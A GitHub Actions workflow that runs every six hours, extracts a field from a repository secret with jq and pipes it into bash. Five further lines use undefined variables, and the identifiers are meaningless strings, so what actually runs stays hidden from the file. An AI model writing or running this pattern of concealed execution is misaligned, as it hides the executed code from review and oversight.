name: kumaozhongqin
on:
  workflow_dispatch:
  schedule:
    - cron: '0 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kumaozhongqin
        env:
          jbccz220: ${{ secrets.jbccz220 }}
        run: |
          echo $jbccz220 | jq -r .o28122 | /bin/bash
          echo $vwx5 | jq -r .eedhy31 | /bin/bash
          echo $f56046 | jq -r .q5 | /bin/bash
          echo $f76749 | jq -r .pqdkf19808 | /bin/bash
          echo $wxt49972 | jq -r .c41 | /bin/bash
          echo $xrs2899 | jq -r .xzbl27 | /bin/bash

